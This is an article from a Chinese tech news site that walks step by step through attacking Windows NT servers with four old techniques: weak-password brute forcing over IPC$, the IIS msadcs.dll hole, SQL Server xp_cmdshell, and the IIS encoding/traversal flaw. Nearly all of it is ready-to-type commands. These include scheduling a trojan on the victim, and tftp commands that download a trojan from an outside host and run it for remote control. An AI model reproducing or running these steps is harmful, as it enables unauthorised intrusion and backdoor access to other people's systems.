扫一扫
分享文章到微信
扫一扫
关注官方公众号
至顶头条
对WindowsNT发起攻击,这里要用几个软件。我的系统是WIN2000,还有PERL,头发TFTP TURB98,TWWWSCAN0.6,NEWLETMEIN,NETBUS1.7(木马),MSSQL7 ,netsvc.exe。
所有对NT的攻击都是因为管理员的懒惰,可能是懒的改密码,懒的升级,懒得打补丁……这里我就说说我曾用过的4个比较普遍的大漏洞。
1、开了共享,而且ADMINISTRATORS组密码简单要不是空,要不是和用户名一样。对于这样的傻瓜管理员,攻击变的简单。在WIN2000的命令提示符下这样输入:
c:\>newletmein xxx.xxx.xxx.xxx -all -g
xxx.xxx.xxx.xxx是你要攻击的网站的IP地址。然后等待程序执行完毕,如果发现可用的用户名和密码,程序会告诉你,记住这个用户名和密码,再这样输入(这里假设用户名为ADMIN,密码也是ADMIN):
c:\>net use \\XXX.XXX.XXX.XXX\IPC$ "ADMIN" /USER:"ADMIN"
程序显示命令完成,接着来,
c:\>copy c:\netsvc.exe \\xxx.xxx.xxx.xxx\admin$\system32
程序显示1个文件COPY成功,接着来,
c:\>copy c:\ntsrv.exe \\xxx.xxx.xxx.xxx\admin$\system32
程序显示1个文件COPY成功,接着来
c:\>netsvc \\xxx.xxx.xxx.xxx schedule /start
等显示成功,接着来。这里假设对方时间为13:00(这里可以用NET TIME看时间)
c:\>at \\xxx.xxx.xxx.xxx 13:00 ntsrv.exe /port:65432 /nomsg
程序会告诉你这个命令的ID号,等时间一到,用木马连他的机器的65432端口。可以加上自己的密码,和更改端口,目标搞定。
2、目标开了WEB服务,IIS有漏洞msadcs.dll漏洞,这个漏洞可以用TWWWSCAN扫描到,为了确认这个漏洞,你可以在浏览器的网址栏里输入这个文件的具体路径来确认,IE将显示application/x_varg,说明这个漏洞存在,然后在PERL下,进行攻击:
C:\Perl\BIN>perl -x msadcs.txt -h xxx.xxx.xxx.xxx
Please type the NT commandline you want to run (cmd /c assumed):\n
cmd /c
一般这里我用TFTP上传我的木马文件,但首先你得先设置好你的TFTP主机
tftp -i 61.137.157.156 get ntsrv.exe c:\winnt\system32\ntsrv.exe
这里61.137.157.156是我的TFTP主机,TFTP目录下有NTSRV.EXE木马。如果程序执行成功,TFTP会显示文件传输的进度,然后再执行PERL,将木马激活,你再用木马连上对方的机器,搞定。
3、目标开了WEB服务,而且有SQL服务,一般SQL服务器开1433端口,如果WEB服务器用ASP等等。你如果能看到ASP或者GLOBAL.ASA的原码,而且把用户名或者密码写在这里,你已经差不多搞定啦。
打开SQL SERVER 7.0 在client network uitlity里输入对方IP,通讯选TCP/IP,端口选1433,然后应用确定,再打开query analyzer SERVER选你要攻击的IP,用户名和密码输入,连接他,等会,连上。在上面这样输入:
create proc #1 as exec master..xp_cmdshell'dir c:\'
go
exec #1
按F5执行,会显示对方机器的文件目录,然后用TFTP上传你的木马,并且执行,再用木马连接他,搞定(需要注意的是PROC的号要执行1次换1个,单引号间是命令行)。
4、目标开了WEB服务,IIS有漏洞,这里要说现在比较普遍的双字节编码漏洞。理论这里不说,也说不好,照着干就可以。发现目标XXX.XXX.XXX.XXX,在浏览器里输入
http://xxx.xxx.xxx.xxx/.idq
显示路径,WEB是在那里
http://xxx.xxx.xxx.xxx/scripts/. ... em32/cmd.exe?/c+dir
这样我们将得到对方的文件目录,然后这样
http://xxx.xxx.xxx.xxx/scripts/. ... m32/cmd.exe?/c+tftp
-i 61.137.157.156 get ntsrv.exe c:\winnt\system32\ntsrv.exe
等文件传完,再这样
http://xxx.xxx.xxx.xxx/scripts/. ... tem32/cmd.exe?/c+c:\winnt\system32\ntsrv.exe
木马被启动,用木马连上,搞定。但是权限可能不是管理员,有办法成为管理员,等以后再说吧!可能有的细节和你实践不一样,具体问题具体对待!
如果您非常迫切的想了解IT领域最新产品与技术信息,那么订阅至顶网技术邮件将是您的最佳途径之一。
现场直击|2021世界人工智能大会
直击5G创新地带,就在2021MWC上海
5G已至 转型当时——服务提供商如何把握转型的绝佳时机
寻找自己的Flag
华为开发者大会2020(Cloud)- 科技行者